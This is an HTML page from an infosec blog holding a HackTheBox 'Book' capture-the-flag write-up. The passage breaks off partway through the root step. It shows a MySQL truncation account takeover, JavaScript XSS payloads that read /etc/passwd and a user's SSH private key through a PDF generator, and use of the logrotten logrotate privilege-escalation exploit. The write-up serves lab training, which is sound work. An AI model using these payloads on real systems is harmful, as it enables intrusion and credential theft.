<!DOCTYPE html>
<html lang=en>
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Book just retired on Hackthebox. It was made by MrR3boot, one of my favorite box maker.This box didn’t break the rule and was really well designed. While rated Medium difficulty, the foothold and us">
<meta property="og:type" content="article">
<meta property="og:title" content="HackTheBox - Book">
<meta property="og:url" content="https://hg8.sh/posts/book/index.html">
<meta property="og:site_name" content="hg8&#39;s Notes — My notes about infosec world. Pentest&#x2F;Bug Bounty&#x2F;CTF Writeups.">
<meta property="og:description" content="Book just retired on Hackthebox. It was made by MrR3boot, one of my favorite box maker.This box didn’t break the rule and was really well designed. While rated Medium difficulty, the foothold and us">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/82153957-fc980d00-986a-11ea-8d28-e035b1c20bd7.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/80860341-5394c400-8c67-11ea-9f66-9a54fbc04fca.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/80860443-e897bd00-8c67-11ea-9587-801bdea248e4.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/80860516-50e69e80-8c68-11ea-9d28-00859a500315.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/80860606-15000900-8c69-11ea-8fc8-26788310a4fe.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/80860905-424db680-8c6b-11ea-8998-d69b33f77bfc.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/80861186-2c40f580-8c6d-11ea-8b57-23051569c034.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/80861578-bb4f0d00-8c6f-11ea-887e-79a8bcfaba61.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/80861655-37e1eb80-8c70-11ea-8b7c-182b06ce491f.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/80864658-65d12b00-8c84-11ea-8d27-93284b3cf9aa.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/80861763-d1a99880-8c70-11ea-8257-892b4ea29d51.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/80864134-fb6abb80-8c80-11ea-87f5-0539a3a5937c.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/80864170-45ec3800-8c81-11ea-9be1-d9610a5ece6f.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/80864528-864cb580-8c83-11ea-874b-ec81a50ded49.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/80864635-36222300-8c84-11ea-8052-f7d82d613722.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/80864841-b1380900-8c85-11ea-89b2-cd55dba6531c.png">
<meta property="og:image" content="https://user-images.githubusercontent.com/9076747/80865051-07597c00-8c87-11ea-90b5-0d889d323d29.png">
<meta property="article:published_time" content="2020-07-10T22:00:00.000Z">
<meta property="article:modified_time" content="2020-07-15T15:52:28.907Z">
<meta property="article:author" content="hg8">
<meta property="article:tag" content="linux">
<meta property="article:tag" content="book">
<meta property="article:tag" content="truncation">
<meta property="article:tag" content="XXS">
<meta property="article:tag" content="LFI">
<meta property="article:tag" content="PDF">
<meta property="article:tag" content="logrotate">
<meta property="article:tag" content="logrotten">
<meta property="article:tag" content="CVE-2019-1014">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://user-images.githubusercontent.com/9076747/82153957-fc980d00-986a-11ea-8d28-e035b1c20bd7.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
     
    <title>HackTheBox - Book :: hg8&#39;s Notes — My notes about infosec world. Pentest/Bug Bounty/CTF Writeups.</title>
    
<link rel="stylesheet" href="/css/style.css">

    
    
<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="hg8's Notes — My notes about infosec world. Pentest/Bug Bounty/CTF Writeups." type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/posts/oouch/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/posts/pwnable/collision/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
    </span>
    <br/>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#User-Flag"><span class="toc-number">1.</span> <span class="toc-text">User Flag</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Recon"><span class="toc-number">1.1.</span> <span class="toc-text">Recon</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Abusing-MySQL-truncation"><span class="toc-number">1.2.</span> <span class="toc-text">Abusing MySQL truncation</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#XSS-in-Dynamic-PDF-Generation"><span class="toc-number">1.3.</span> <span class="toc-text">XSS in Dynamic PDF Generation</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Root"><span class="toc-number">2.</span> <span class="toc-text">Root</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Recon-1"><span class="toc-number">2.1.</span> <span class="toc-text">Recon</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Logrotate-exploit"><span class="toc-number">2.2.</span> <span class="toc-text">Logrotate exploit</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        <header id="header">
  <a href="/">
  
      <div id="logo" style="background-image: url(/images/logo.webp);"></div>
  
    <span class="logo__mark"></span>
    <span class="logo__text">./hg8.sh</span>
    <span class="logo__cursor"></span>
  </a>
  <div id="nav">
    <ul>
      <li class="icon">
        <a href="#"><i class="fas fa-bars fa-2x"></i></a>
      </li>
       
        <li><a href="/">Home</a></li>
       
        <li><a href="/about/">About</a></li>
       
        <li><a href="/archives/">Posts</a></li>
       
        <li><a href="/search/">Search</a></li>
      
    </ul>
  </div>
</header>

        
          <br>
          <br>
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        HackTheBox - Book
    </h1>



    <div class="meta"> 
      
    <div class="postdate">
      
        <time datetime="2020-07-10T22:00:00.000Z" itemprop="datePublished">11-07-2020</time>
        
      
    </div>


      — Written by 
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">hg8</span>
      </span>
      —
      11 min read
    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <img width="584" alt="book-hackthebox" src="https://user-images.githubusercontent.com/9076747/82153957-fc980d00-986a-11ea-8d28-e035b1c20bd7.png">

<p>Book just retired on Hackthebox. It was made by MrR3boot, one of my favorite box maker.<br>This box didn’t break the rule and was really well designed. While rated Medium difficulty, the foothold and user gave me more trouble than some Hard rated box. For once you have to think way more in real life scenarios than in CTF-like style. Still super interesting and I recommend it if you are comfortable with medium and hard boxes. Place to the write-up now!</p>
<p><strong>Tl;Dr:</strong> The user flag required you to exploit two parts of the “Book” website. First you had to exploit a MySQL truncation misconfiguration to login as <code>admin</code> to the admin panel. Then you login as normal user to the user interface of the website. From there you exploit a local file read vulnerability via XSS in a dynamically generated PDF visible from the admin interface you accessed earlier. Using this vulnerability you can access the user <code>reader</code> SSH key and use it to grab the flag.<br>The root part consisted in exploited a vulnerability (CVE-2019-10143) in the <code>logrotate</code> utility running allowing running arbitrary binary as <code>root</code>.</p>
<p>Alright! Let’s get into the details now!</p>
<hr>
<p>First thing first, let’s add the box IP to the host file:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ <span class="built_in">echo</span> <span class="string">"10.10.10.176 book.htb"</span> &gt;&gt; /etc/hosts</span><br></pre></td></tr></table></figure>

<p>and let’s start!</p>
<h2 id="User-Flag"><a href="#User-Flag" class="headerlink" title="User Flag"></a>User Flag</h2><h3 id="Recon"><a href="#Recon" class="headerlink" title="Recon"></a>Recon</h3><p>Let’s start with the classic <code>nmap</code> scan to see which ports are open on the box:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ nmap -sV -sT -sC book.htb</span><br><span class="line">Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-28 18:33 CET</span><br><span class="line">Nmap scan report <span class="keyword">for</span> book.htb (10.10.10.176)</span><br><span class="line">PORT   STATE SERVICE VERSION</span><br><span class="line">22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)</span><br><span class="line">80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))</span><br><span class="line">|_http-server-header: Apache/2.4.29 (Ubuntu)</span><br><span class="line">|_http-title: LIBRARY - Read | Learn | Have Fun</span><br><span class="line">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span><br></pre></td></tr></table></figure>

<p>We have a classical web app running on port 80 and the SSH port 22 open.</p>
<p>Opening <code>http://book.htb</code> display a following page:</p>
<p><img src="https://user-images.githubusercontent.com/9076747/80860341-5394c400-8c67-11ea-9f66-9a54fbc04fca.png" alt="book homepage"></p>
<p>We have a sign-up/login form. Before anything else let’s run <code>gobuster</code> to see if we can find anything else valuable:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ gobuster dir -u <span class="string">"http://book.htb/"</span> -w ~/SecLists/Discovery/Web-Content/big.txt -x php</span><br><span class="line">===============================================================</span><br><span class="line">Gobuster v3.0.1</span><br><span class="line">by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)</span><br><span class="line">===============================================================</span><br><span class="line">/admin (Status: 301)</span><br><span class="line">/books.php (Status: 302)</span><br><span class="line">/collections.php (Status: 302)</span><br><span class="line">/contact.php (Status: 302)</span><br><span class="line">/db.php (Status: 200)</span><br><span class="line">/docs (Status: 301)</span><br><span class="line">/download.php (Status: 302)</span><br><span class="line">/feedback.php (Status: 302)</span><br><span class="line">/home.php (Status: 302)</span><br><span class="line">/images (Status: 301)</span><br><span class="line">/index.php (Status: 200)</span><br><span class="line">/logout.php (Status: 302)</span><br><span class="line">/profile.php (Status: 302)</span><br><span class="line">/search.php (Status: 302)</span><br><span class="line">/server-status (Status: 403)</span><br><span class="line">/settings.php (Status: 302)</span><br></pre></td></tr></table></figure>

<p>We do have plenty of pages, once login we will be able to check all of them in more details. First thing that catch the eye is the <code>/admin</code> endpoint. Opening it display almost the exact same login page, expect that it’s only possible to login:</p>
<p><img src="https://user-images.githubusercontent.com/9076747/80860443-e897bd00-8c67-11ea-9587-801bdea248e4.png" alt="book admin login page"></p>
<p>Since we don’t have enough information to try anything on this admin page let’s go back to the normal login form.</p>
<p>From here let’s create a user account and use it to login. Once done we get welcomed to the following panel:</p>
<p><img src="https://user-images.githubusercontent.com/9076747/80860516-50e69e80-8c68-11ea-9d28-00859a500315.png" alt="book user panel"></p>
<p>From here we can see we have access to most pages that were returned by <code>gobuster</code>. </p>
<p>The most interesting part seems to be the <code>/collections</code> one where it’s possible to upload your own books: </p>
<p><img src="https://user-images.githubusercontent.com/9076747/80860606-15000900-8c69-11ea-8fc8-26788310a4fe.png" alt="book collections upload"></p>
<p>When facing a file upload form it’s always good to try uploading a web shell right ? Unfortunately, no matter what is being uploaded, the form returns the following message:</p>
<blockquote>
<p>Thanks for the submission. We will evaluate and update the list</p>
</blockquote>
<p>The problem here is that we have no confirmations if the file got uploaded successfully and no idea where it got uploaded. Yet we notice the “<em>We will evaluate and update the list</em>“. This probably means that from the admin panel we found early it should be possible to see the “pending” upload ? Let’s keep the that in mind.</p>
<p>Our next step here is to find a way to enter the admin panel to see if we can get access to additional informations and maybe to the uploaded files in any way. </p>
<p>While looking around we stumble across another useful piece of informations in the <code>/contact.php</code> page:</p>
<p><img src="https://user-images.githubusercontent.com/9076747/80860905-424db680-8c6b-11ea-8998-d69b33f77bfc.png" alt="book contact page"></p>
<p>We now know the admin email is <code>admin@book.htb</code> (even though we could have guessed it). We only need to find its password now. Brute-forcing is never the way to go on web app and will just risk to break the box for other users so let’s find another method.</p>
<p>In the same idea of the <a href="https://hg8.sh/posts/forwardslash/">ForwardSlash</a> box maybe we can Sign up using <code>admin@book.htb</code> as email and get the account password overwritten ? Unfortunately trying so simply returns the following error message:</p>
<blockquote>
<p>User Exits!</p>
</blockquote>
<p>To be honest I got a bit short on ideas at this point until I noticed something interesting in my user account. We have the possibility to edit our username, but it gets truncated after 10 chars:</p>
<p><img src="https://user-images.githubusercontent.com/9076747/80861186-2c40f580-8c6d-11ea-8b57-23051569c034.png" alt="book username"></p>
<p>Changing my username to <code>abcdefghijqlmnopqrstuv</code> will return as follow:</p>
<blockquote>
<p>Signed in as abcdefghij</p>
</blockquote>
<p>Spaces seems to be removed aswell, so changing my username to <code>hg8       a</code> returns:</p>
<blockquote>
<p>Signed in as hg8</p>
</blockquote>
<p>This made us wonder if the same happen on account creation ? What would happen if we try to create an account with <code>admin@book.htb··············a</code> as email (<code>·</code> being a space) ? Maybe you could overwrite the admin password this way ?</p>
<h3 id="Abusing-MySQL-truncation"><a href="#Abusing-MySQL-truncation" class="headerlink" title="Abusing MySQL truncation"></a>Abusing MySQL truncation</h3><p>Let’s go to back to the Sign Up form and launch the following request:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ curl <span class="string">'http://book.htb/'</span> -i \</span><br><span class="line">-d <span class="string">'name=admin&amp;email=admin@book.htb            a&amp;password=hg8.sh'</span></span><br><span class="line">HTTP/1.1 302 Found</span><br><span class="line">Server: Apache/2.4.29 (Ubuntu)</span><br><span class="line">Set-Cookie: PHPSESSID=nxxxxxxxxxxxxxxxxx; path=/</span><br><span class="line">location: index.php</span><br><span class="line">Content-Length: 0</span><br><span class="line">Content-Type: text/html; charset=UTF-8</span><br></pre></td></tr></table></figure>

<p><code>302 Found</code> and a redirect to <code>index.php</code>. Looks like we are on the right tracks! Let’s now try to login using those credentials and bingo!</p>
<p><img src="https://user-images.githubusercontent.com/9076747/80861578-bb4f0d00-8c6f-11ea-887e-79a8bcfaba61.png" alt="book admin panel"></p>
<p>From there we have access to various moderation tools. We do have access to the <code>Collections</code> part we were looking at in the user panel:</p>
<p><img src="https://user-images.githubusercontent.com/9076747/80861655-37e1eb80-8c70-11ea-8b7c-182b06ce491f.png" alt="book admin panel collections"></p>
<p>On this page it is possible to download a PDF of the users list and the book collections. The PDF content is a simple table and available through a random filename: </p>
<p><img src="https://user-images.githubusercontent.com/9076747/80864658-65d12b00-8c84-11ea-8d27-93284b3cf9aa.png" alt="book admin panel pdf"></p>
<p>At first look this table looks like a simple HTML table converted to PDF. Here is the HTML Table <a href="https://www.w3schools.com/html/html_tables.asp" target="_blank" rel="noopener">example available at W3School</a>:</p>
<p><img src="https://user-images.githubusercontent.com/9076747/80861763-d1a99880-8c70-11ea-8257-892b4ea29d51.png" alt="w3school html table"></p>
<p>This puts us on the right tracks, the PDF is very probably dynamically generated from a page of this admin panel with a tool like <a href="https://phantomjs.org/" target="_blank" rel="noopener">PhantomJS</a> or so… Let’s dig into this idea.</p>
<h3 id="XSS-in-Dynamic-PDF-Generation"><a href="#XSS-in-Dynamic-PDF-Generation" class="headerlink" title="XSS in Dynamic PDF Generation"></a>XSS in Dynamic PDF Generation</h3><p>So our starting point is a guess that the <code>collections</code> PDF is generated from an HTML page. Knowing we can control some of the values that end end in the PDF (using the user panel) maybe we can inject something in the final PDF ?</p>
<p>First let’s try to inject HTML to see if we can validate our idea. Going back to the user panel let’s enter HTLM tag in the <code>author</code> field:</p>
<p><img src="https://user-images.githubusercontent.com/9076747/80864134-fb6abb80-8c80-11ea-87f5-0539a3a5937c.png" alt="book html tag injection"></p>
<p>Let’s send it and go back to the admin panel to generate the <code>collections</code> PDF:</p>
<p><img src="https://user-images.githubusercontent.com/9076747/80864170-45ec3800-8c81-11ea-9be1-d9610a5ece6f.png" alt="book pdf html tag injection"></p>
<p>It worked, we are definitely on the right track. Since we can inject HTLM, can we inject Javascript aswell ? Let’s give it a try:</p>
<p><img src="https://user-images.githubusercontent.com/9076747/80864528-864cb580-8c83-11ea-874b-ec81a50ded49.png" alt="book XSS collections"></p>
<p>Going back to the admin panel we can find our PDF have been fully replaced with our “Test” string:</p>
<p><img src="https://user-images.githubusercontent.com/9076747/80864635-36222300-8c84-11ea-8052-f7d82d613722.png" alt="book collections XSS"></p>
<p>We just have confirmed our ability to XSS on server side. The first application that comes to mind with this vulnerability is local file read using javascript. Let’s start with the classical <code>/etc/passwd</code>.</p>
<p>We can come up with the following payload:</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line">  a = <span class="keyword">new</span> XMLHttpRequest;</span><br><span class="line">  a.onload = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">   <span class="built_in">document</span>.write(<span class="keyword">this</span>.responseText)</span><br><span class="line">  &#125;;</span><br><span class="line">  a.open(<span class="string">"GET"</span>, <span class="string">"file:///etc/passwd"</span>);</span><br><span class="line">  a.send();</span><br><span class="line">&lt;<span class="regexp">/script&gt;</span></span><br></pre></td></tr></table></figure>

<p>First the payload will open the local file <code>/etc/passwd</code> then write its content to the document root. Let’s send it on the user panel and observe the results on admin panel generated PDF:</p>
<p><img src="https://user-images.githubusercontent.com/9076747/80864841-b1380900-8c85-11ea-89b2-cd55dba6531c.png" alt="book local file read"></p>
<p>Neat, thanks to file informations we know the user we are after: <code>reader</code>. </p>
<p>If we are lucky enough maybe we can use the local file read vulnerability to access <code>reader</code> SSH key. We should be able to do so using the following payload:</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line">  a = <span class="keyword">new</span> XMLHttpRequest;</span><br><span class="line">  a.onload = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">    <span class="built_in">document</span>.write(<span class="keyword">this</span>.responseText)</span><br><span class="line">  &#125;;</span><br><span class="line">  a.open(<span class="string">"GET"</span>, <span class="string">"file:///home/reader/.ssh/id_rsa"</span>);</span><br><span class="line">  a.send();</span><br><span class="line">&lt;<span class="regexp">/script&gt;</span></span><br></pre></td></tr></table></figure>

<p>Again let’s send this payload and access the generated PDF:</p>
<p><img src="https://user-images.githubusercontent.com/9076747/80865051-07597c00-8c87-11ea-90b5-0d889d323d29.png" alt="book local file inclusion id_rsa"></p>
<p>Using this key we can connect to <code>reader</code> and grab the user flag:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ ssh -i id_rsa reader@book.htb</span><br><span class="line">Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 5.4.1-050401-generic x86_64)</span><br><span class="line"></span><br><span class="line">Last login: Wed Jan 29 13:03:06 2020 from 10.10.14.3</span><br><span class="line">reader@book:~$ ls</span><br><span class="line">backups user.txt</span><br><span class="line">reader@book:~$ cat user.txt</span><br><span class="line">5xxxxxxxxxxxxxxxxxxxxxxxxxxc</span><br></pre></td></tr></table></figure>



<h2 id="Root"><a href="#Root" class="headerlink" title="Root"></a>Root</h2><h3 id="Recon-1"><a href="#Recon-1" class="headerlink" title="Recon"></a>Recon</h3><p>Looking around we quickly notice an usual folder in the <code>reader</code> home directory:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">reader@book:~$ ls</span><br><span class="line">backups user.txt</span><br><span class="line">reader@book:~$ ls -l backups/</span><br><span class="line">total 4</span><br><span class="line">-rw-r--r-- 1 reader reader  0 Jan 29 13:05 access.log</span><br><span class="line">-rw-r--r-- 1 reader reader 91 Jan 29 13:05 access.log.1</span><br></pre></td></tr></table></figure>

<p>These two files are Apache access logs. It’s usually found in <code>/var/log/apache2/</code> directory. Seems like some task is backing up those access log files in <code>reader</code> home directory. </p>
<p>Before searching further, let’s focus on this unusual backup task. As every unusual items on a box it’s often the way to privilege escalation. </p>
<p>To do so let’s explore running processes to see if we can find anything related to Apache access log. For monitoring processes I always use <a href="https://github.com/DominicBreuker/pspy" target="_blank" rel="noopener"><code>pspy</code></a> which is a really great tool and helps a lot during CTF:</p>
<p>First let’s download and push <code>pspy</code> to the server:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">[hg8@archbook ~]$ wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64</span><br><span class="line">[hg8@archbook ~]$ scp -i id_rsa ~/tools/pspy64 reader@book.htb:/tmp/.hg8</span><br><span class="line">pspy64                                                          100% 3006KB  96.7KB/s   00:31</span><br></pre></td></tr></table></figure>

<p>Then we can run <code>pspy</code> and quickly enough a interesting process popup: </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">reader@book:&#x2F;tmp&#x2F;.hg8$ .&#x2F;pspy64</span><br><span class="line">pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855</span><br><span class="line"></span><br><span class="line">     ██▓███    ██████  ██▓███ ▓██   ██▓</span><br><span class="line">    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒</span><br><span class="line">    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░</span><br><span class="line">    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░</span><br><span class="line">    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░</span><br><span class="line">    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒</span><br><span class="line">    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░</span><br><span class="line">    ░░       ░  ░  ░  ░░       ▒ ▒ ░░</span><br><span class="line">                   ░           ░ ░</span><br><span class="line">                               ░ ░</span><br><span class="line"></span><br><span class="line">[...]</span><br><span class="line">2020&#x2F;05&#x2F;02 14:57:34 CMD: UID&#x3D;0    PID&#x3D;63306  | &#x2F;bin&#x2F;sh &#x2F;root&#x2F;log.sh</span><br><span class="line">2020&#x2F;05&#x2F;02 14:57:34 CMD: UID&#x3D;0    PID&#x3D;63308  | sleep 5</span><br><span class="line">2020&#x2F;05&#x2F;02 14:57:44 CMD: UID&#x3D;0    PID&#x3D;63313  | &#x2F;usr&#x2F;sbin&#x2F;logrotate -f &#x2F;root&#x2F;log.cfg</span><br></pre></td></tr></table></figure>

<p>We have a <code>logrotate</code> process running as root. Having never used it before let’s check it’s manual:</p>
<blockquote>
<p>Logrotate  is designed to ease administration of systems that generate large numbers of log  files.  It allows automatic rotation, compression, removal, and mailing of log files.  Each  log file may be handled daily, weekly, monthly, or when it grows too large.</p>
</blockquote>
<p>Let’s find out the arguments used in the command <code>/usr/sbin/logrotate -f /root/log.cfg</code>:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">reader@book:/$ man logrotate | grep -A 5 <span class="string">"\-f"</span></span><br><span class="line">-f, --force</span><br><span class="line">    Tells  logrotate  to force the rotation, even <span class="keyword">if</span> it doesn<span class="string">'t think this is </span></span><br><span class="line"><span class="string">    necessary.</span></span><br><span class="line"><span class="string">    Sometimes this is useful after adding new entries to a logrotate config file, </span></span><br><span class="line"><span class="string">    or  if old log files have been removed by hand, as the new files will be created, </span></span><br><span class="line"><span class="string">    and logging will continue correctly.</span></span><br></pre></td></tr></table></figure>

<p>While the <code>/root/log.cfg</code> probably contains the configuration to copy <code>access.log</code> files to <code>reader</code> home directory. </p>
<p>After looking at the documentation for a while it didn’t seem this process can be abused to achieve privilege escalation on the box. </p>
<p>Since the process is running as root maybe we can check if the version running have any public vulnerability allowing us to privilege escalation. The version on the box is <code>3.11</code>.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">reader@book:/$ logrotate --version</span><br><span class="line">logrotate 3.11.0</span><br></pre></td></tr></table></figure>

<p>A quick Google search yield an interesting result:</p>
<blockquote>
<p><strong>Exploit Title: logrotten 3.15.1 - Privilege Escalation</strong></p>
<p>logrotate is prone to a race condition after renaming the logfile.</p>
<p>If <code>logrotate</code> is executed as root, with option that creates a<br>file ( like create, copy, compress, etc.) and the user is in control<br>of the logfile path, it is possible to abuse a race-condition to write<br>files in ANY directories.</p>
<p>An attacker could elevate his privileges by writing reverse-shells into<br>directories like “/etc/bash_completition.d/“.</p>
<p><a href="https://github.com/whotwagner/logrotten" target="_blank" rel="noopener">Logrotten</a></p>
</blockquote>
<p>Looks exactly what we need right ? Since the <code>/home/reader/backups</code> directory is under our control it seems like we have all the elements to successfully use this exploit. </p>
<h3 id="Logrotate-exploit"><a href="#Logrotate-exploit" class="headerlink" title="Logrotate exploit"></a>Logrotate exploit</h3><p>Let’s follow the <a href="https://github.com/whotwagner/logrotten/blob/master/logrotten.c" target="_blank" rel="noopener">exploit page</a> to setup everything properly.</p>
<ol>
<li>Let’s compile the exploit file. After reviewing the code it seems like no changes are required in order to work properly on our box:</li>
</ol>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">reader@book:/tmp/.hg8$ vi logrotten.c</span><br><span class="line">reader@book:/tmp/.hg8$ gcc -o logrotten logrotten.c</span><br><span class="line">reader@book:/tmp/.hg8$ ls</span><br><span class="line">logrotten  logrotten.c</span><br></pre></td></tr></table></figure>

<ol start="2">
<li>Then let’s create our payload. The payload I will use consist in adding my SSH public key in the <code>authorized_keys</code> of <code>root</code> account:</li>
</ol>
